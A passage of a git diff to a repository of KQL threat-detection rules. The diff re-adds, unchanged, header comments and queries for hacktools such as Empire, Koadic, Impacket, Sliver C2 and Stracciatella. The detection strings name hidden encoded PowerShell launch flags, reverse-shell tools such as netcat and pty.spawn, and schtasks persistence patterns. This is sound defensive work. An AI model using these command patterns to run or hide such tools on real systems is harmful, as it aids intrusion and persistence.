ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql index 04c0865a..62e06e69 100644 --- a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql +++ b/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation -// Author: Markus Neis, @Karneades -// Date: 2018-03-06 -// Level: high -// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Default PowerSploit/Empire Scheduled Task Creation +// Author: Markus Neis, @Karneades +// Date: 2018-03-06 +// Level: high +// Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.g0022, attack.g0060, car.2013-08-001, attack.t1053.005, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "/SC ONLOGON" or ProcessCommandLine contains "/SC DAILY /ST" or ProcessCommandLine contains "/SC ONIDLE" or ProcessCommandLine contains "/SC HOURLY") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "powershell.exe -NonI" and ProcessCommandLine contains "/TN Updater /TR") and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql index 7ca42abc..10b139e8 100644 --- a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql +++ b/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Empire PowerShell Launch Parameters -// Author: Florian Roth (Nextron Systems) -// Date: 2019-04-20 -// Level: high -// Description: Detects suspicious powershell command line parameters used in Empire -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Other tools that incidentally use the same command line parameters - -DeviceProcessEvents +// Title: HackTool - Empire PowerShell Launch Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2019-04-20 +// Level: high +// Description: Detects suspicious powershell command line parameters used in Empire +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Other tools that incidentally use the same command line parameters + +DeviceProcessEvents | where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand " \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql index a8c8d9fb..a5476d32 100644 --- a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql +++ b/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Jlaive In-Memory Assembly Execution -// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) -// Date: 2022-05-24 -// Level: medium -// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 - -DeviceProcessEvents +// Title: HackTool - Jlaive In-Memory Assembly Execution +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-24 +// Level: medium +// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents | where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/Execution/hacktool_koadic_execution.kql index 1cdebca1..2470610e 100644 --- a/KQL/rules/Execution/hacktool_koadic_execution.kql +++ b/KQL/rules/Execution/hacktool_koadic_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Koadic Execution -// Author: wagga, Jonhnathan Ribeiro, oscd.community -// Date: 2020-01-12 -// Level: high -// Description: Detects command line parameters used by Koadic hack tool -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007 - -DeviceProcessEvents +// Title: HackTool - Koadic Execution +// Author: wagga, Jonhnathan Ribeiro, oscd.community +// Date: 2020-01-12 +// Level: high +// Description: Detects command line parameters used by Koadic hack tool +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents | where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/Execution/hacktool_pchunter_execution.kql index 766616e0..f0e70f52 100644 --- a/KQL/rules/Execution/hacktool_pchunter_execution.kql +++ b/KQL/rules/Execution/hacktool_pchunter_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - PCHunter Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali -// Date: 2022-10-10 -// Level: high -// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff -// MITRE Tactic: Execution -// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - PCHunter Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2022-10-10 +// Level: high +// Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1082, attack.t1057, attack.t1012, attack.t1083, attack.t1007 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((SHA1 startswith "5F1CBC3D99558307BC1250D084FA968521482025" or SHA1 startswith "3FB89787CB97D902780DA080545584D97FB1C2EB") or (MD5 startswith "987B65CD9B9F4E9A1AFD8F8B48CF64A7" or MD5 startswith "228DD0C2E6287547E26FFBD973A40F14") or (SHA256 startswith "2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32" or SHA256 startswith "55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C")) or (FolderPath endswith "\\PCHunter64.exe" or FolderPath endswith "\\PCHunter32.exe") or (ProcessVersionInfoOriginalFileName =~ "PCHunter.exe" or ProcessVersionInfoFileDescription =~ "Epoolsoft Windows Information View Tools") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql index 3658ad67..664ddad5 100644 --- a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql +++ b/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Potential Impacket Lateral Movement Activity -// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch -// Date: 2019-09-03 -// Level: high -// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003 - -DeviceProcessEvents +// Title: HackTool - Potential Impacket Lateral Movement Activity +// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch +// Date: 2019-09-03 +// Level: high +// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql index 5199f9e7..7d633d59 100644 --- a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql +++ b/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - RedMimicry Winnti Playbook Execution -// Author: Alexander Rausch -// Date: 2020-06-24 -// Level: high -// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011 - -DeviceProcessEvents +// Title: HackTool - RedMimicry Winnti Playbook Execution +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1106, attack.t1059.003, attack.t1218.011 + +DeviceProcessEvents | where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql index 05cd8f75..4c431cca 100644 --- a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql +++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql @@ -1,11 +1,11 @@ -// Title: HackTool - SharpWSUS/WSUSpendu Execution -// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-07 -// Level: high -// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. -// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1210 - -DeviceProcessEvents +// Title: HackTool - SharpWSUS/WSUSpendu Execution +// Author: @Kostastsale, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-07 +// Level: high +// Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. +// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1210 + +DeviceProcessEvents | where (ProcessCommandLine contains " -Inject " and (ProcessCommandLine contains " -PayloadArgs " or ProcessCommandLine contains " -PayloadFile ")) or ((ProcessCommandLine contains " approve " or ProcessCommandLine contains " create " or ProcessCommandLine contains " check " or ProcessCommandLine contains " delete ") and (ProcessCommandLine contains " /payload:" or ProcessCommandLine contains " /payload=" or ProcessCommandLine contains " /updateid:" or ProcessCommandLine contains " /updateid=")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql index 94238395..ed008cb8 100644 --- a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql +++ b/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Sliver C2 Implant Activity Pattern -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-08-25 -// Level: critical -// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Sliver C2 Implant Activity Pattern +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-08-25 +// Level: critical +// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8" \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/Execution/hacktool_stracciatella_execution.kql index 67bc7020..0375e44c 100644 --- a/KQL/rules/Execution/hacktool_stracciatella_execution.kql +++ b/KQL/rules/Execution/hacktool_stracciatella_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Stracciatella Execution -// Author: pH-T (Nextron Systems) -// Date: 2023-04-17 -// Level: high -// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Stracciatella Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") \ No newline at end of file diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql index 4af545e9..6a6dc4e9 100644 --- a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Hardware Model Reconnaissance Via Wmic.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2023-02-14 -// Level: medium -// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, car.2016-03-002 - -DeviceProcessEvents +// Title: Hardware Model Reconnaissance Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, car.2016-03-002 + +DeviceProcessEvents | where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql index dbf7b375..6781bb4a 100644 --- a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql +++ b/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql @@ -1,12 +1,12 @@ -// Title: Hidden Powershell in Link File Pattern -// Author: frack113 -// Date: 2022-02-06 -// Level: medium -// Description: Detects events that appear when a user click on a link file with a powershell command in it -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Legitimate commands in .lnk files - -DeviceProcessEvents +// Title: Hidden Powershell in Link File Pattern +// Author: frack113 +// Date: 2022-02-06 +// Level: medium +// Description: Detects events that appear when a user click on a link file with a powershell command in it +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate commands in .lnk files + +DeviceProcessEvents | where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql index a28b6a72..56670f14 100644 --- a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql +++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql @@ -1,10 +1,10 @@ -// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion - -DeviceProcessEvents +// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: high +// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql index b38af5a6..eb08253e 100644 --- a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql +++ b/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql @@ -1,10 +1,10 @@ -// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-10 -// Level: medium -// Description: Detects powershell scripts that import modules from suspicious directories -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Import PowerShell Modules From Suspicious Directories - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-10 +// Level: medium +// Description: Detects powershell scripts that import modules from suspicious directories +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\" \ No newline at end of file diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql index fddb178a..a96b028d 100644 --- a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql +++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql @@ -1,10 +1,10 @@ -// Title: Inline Python Execution - Spawn Shell Via OS System Library -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Inline Python Execution - Spawn Shell Via OS System Library +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ((ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -c " and ProcessCommandLine contains "os.system(")) and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) \ No newline at end of file diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql index a30299b8..81474161 100644 --- a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql +++ b/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql @@ -1,12 +1,12 @@ -// Title: Insecure Proxy/DOH Transfer Via Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-27 -// Level: medium -// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Access to badly maintained internal or development systems - -DeviceProcessEvents +// Title: Insecure Proxy/DOH Transfer Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Access to badly maintained internal or development systems + +DeviceProcessEvents | where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql index d98ec616..1538d4d3 100644 --- a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql +++ b/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql @@ -1,12 +1,12 @@ -// Title: Insecure Transfer Via Curl.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-30 -// Level: medium -// Description: Detects execution of "curl.exe" with the "--insecure" flag. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Access to badly maintained internal or development systems - -DeviceProcessEvents +// Title: Insecure Transfer Via Curl.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-30 +// Level: medium +// Description: Detects execution of "curl.exe" with the "--insecure" flag. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Access to badly maintained internal or development systems + +DeviceProcessEvents | where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql index a5247255..79fa93de 100644 --- a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql +++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql @@ -1,13 +1,13 @@ -// Title: Installation of WSL Kali-Linux -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-10 -// Level: high -// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL). -// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams - -DeviceProcessEvents +// Title: Installation of WSL Kali-Linux +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-10 +// Level: high +// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL). +// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams + +DeviceProcessEvents | where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali" \ No newline at end of file diff --git a/KQL/rules/Execution/interactive_bash_suspicious_children.kql b/KQL/rules/Execution/interactive_bash_suspicious_children.kql index 39f937fb..f0c6cf48 100644 --- a/KQL/rules/Execution/interactive_bash_suspicious_children.kql +++ b/KQL/rules/Execution/interactive_bash_suspicious_children.kql @@ -1,12 +1,12 @@ -// Title: Interactive Bash Suspicious Children -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-14 -// Level: medium -// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036 -// False Positives: -// - Legitimate software that uses these patterns - -DeviceProcessEvents +// Title: Interactive Bash Suspicious Children +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-14 +// Level: medium +// Description: Detects suspicious interactive bash as a parent to rather uncommon child processes +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.004, attack.t1036 +// False Positives: +// - Legitimate software that uses these patterns + +DeviceProcessEvents | where InitiatingProcessCommandLine =~ "bash -i" and ((ProcessCommandLine contains "-c import " or ProcessCommandLine contains "base64" or ProcessCommandLine contains "pty.spawn") or (FolderPath endswith "whoami" or FolderPath endswith "iptables" or FolderPath endswith "/ncat" or FolderPath endswith "/nc" or FolderPath endswith "/netcat")) \ No newline at end of file diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql index a3a3354c..d9a5780c 100644 --- a/KQL/rules/Execution/jamf_mdm_execution.kql +++ b/KQL/rules/Execution/jamf_mdm_execution.kql @@ -1,12 +1,12 @@ -// Title: JAMF MDM Execution -// Author: Jay Pandit -// Date: 2023-08-22 -// Level: low -// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate use of the JAMF CLI tool by IT support and administrators - -DeviceProcessEvents +// Title: JAMF MDM Execution +// Author: Jay Pandit +// Date: 2023-08-22 +// Level: low +// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the JAMF CLI tool by IT support and administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf" \ No newline at end of file diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql index 27fa185e..9016c537 100644 --- a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql +++ 